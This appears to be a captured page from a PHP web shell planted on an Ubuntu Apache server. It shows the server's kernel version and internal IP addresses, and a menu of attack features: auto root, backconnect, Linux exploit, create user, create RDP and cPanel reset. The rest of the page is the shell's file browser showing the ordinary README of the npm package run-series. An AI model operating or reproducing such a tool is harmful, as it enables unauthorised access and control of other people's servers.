Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
run-series /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.06
KB
-rw-rw-r--
README.md
2.71
KB
-rw-rw-r--
index.js
565
B
-rw-rw-r--
package.json
1.21
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# run-series [![travis][travis-image]][travis-url] [![npm][npm-image]][npm-url] [![downloads][downloads-image]][downloads-url] [![javascript style guide][standard-image]][standard-url] [travis-image]: https://img.shields.io/travis/feross/run-series/master.svg [travis-url]: https://travis-ci.org/feross/run-series [npm-image]: https://img.shields.io/npm/v/run-series.svg [npm-url]: https://npmjs.org/package/run-series [downloads-image]: https://img.shields.io/npm/dm/run-series.svg [downloads-url]: https://npmjs.org/package/run-series [standard-image]: https://img.shields.io/badge/code_style-standard-brightgreen.svg [standard-url]: https://standardjs.com ### Run an array of functions in series  [](https://saucelabs.com/u/run-series) ### install ``` npm install run-series ``` ### usage #### series(tasks, [callback]) Run the functions in the `tasks` array in series, each one running once the previous function has completed. If any functions in the series pass an error to its callback, no more functions are run, and `callback` is immediately called with the value of the error. Otherwise, `callback` receives an array of results when `tasks` have completed. ##### arguments - `tasks` - An array containing functions to run, each function is passed a `callback(err, result)` which it must call on completion with an error `err` (which can be `null`) and an optional result value. - `callback(err, results)` - An optional callback to run once all the functions have completed. This function gets a results array containing all the result arguments passed to the task callbacks. ##### example ```js var series = require('run-series') series([ function (callback) { // do some stuff ... callback(null, 'one') }, function (callback) { // do some stuff ... callback(null, 'two') } ], // optional callback function (err, results) { // the results array will equal ['one','two'] }) ``` This module is basically equavalent to [`async.series`](https://github.com/caolan/async#seriestasks-callback), but it's handy to just have the functions you need instead of the kitchen sink. Modularity! Especially handy if you're serving to the browser and need to reduce your javascript bundle size. Works great in the browser with [browserify](http://browserify.org/)! ### see also - [run-auto](https://github.com/feross/run-auto) - [run-parallel](https://github.com/feross/run-parallel) - [run-parallel-limit](https://github.com/feross/run-parallel-limit) - [run-waterfall](https://github.com/feross/run-waterfall) ### license MIT. Copyright (c) [Feross Aboukhadijeh](http://feross.org).
Close